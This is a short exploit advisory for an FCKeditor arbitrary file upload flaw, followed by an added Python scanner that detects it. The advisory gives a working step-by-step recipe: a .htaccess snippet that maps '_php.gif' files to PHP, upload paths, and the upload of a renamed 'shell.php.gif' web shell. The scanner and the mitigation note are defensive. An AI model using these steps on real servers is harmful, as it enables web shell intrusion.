FCKeditor Upload Vulnerability (All PHP Versions)
Author: Anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this .htaccess with FCKeditor.
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available from the server.
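As an added defensive example (not part of the advisory above), the Python check below walks an upload directory and flags the two artifacts this technique leaves behind: a .htaccess that maps files to the PHP handler, and a file name carrying the "_php." marker produced by FCKeditor's rename. The directory path and the sample files are constructed assumptions; the durable fix is to deny .htaccess overrides (AllowOverride None) and PHP execution in the upload path.

```python
import os
import re
import tempfile

# Directives that can make Apache execute a file as PHP when they appear in a
# user-controlled .htaccess (SetHandler is the one the advisory relies on).
HANDLER_RE = re.compile(
    r"^\s*(SetHandler|AddHandler|AddType)\s+.*php", re.IGNORECASE | re.MULTILINE
)
# FCKeditor rewrites "shell.php.gif" to "shell_php.gif"; the result still
# carries the "_php." marker that the planted .htaccess keys on.
RENAMED_PHP_RE = re.compile(r"_php\.[a-z0-9]+$", re.IGNORECASE)


def scan_upload_dir(root):
    """Return a list of (path, reason) findings for an upload tree."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name.lower() == ".htaccess":
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    if HANDLER_RE.search(fh.read()):
                        findings.append((path, "htaccess maps files to PHP"))
                    else:
                        findings.append((path, "htaccess in upload dir"))
            elif RENAMED_PHP_RE.search(name):
                findings.append((path, "renamed double-extension upload"))
    return findings


def demo():
    """Build a constructed sample upload tree and return the scan reasons."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, ".htaccess"), "w", encoding="utf-8") as fh:
            fh.write('<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n')
        for name in ("shell_php.gif", "photo.gif"):  # one suspicious, one benign
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(b"GIF89a")
        return sorted(reason for _path, reason in scan_upload_dir(root))


if __name__ == "__main__":
    for reason in demo():
        print(reason)
```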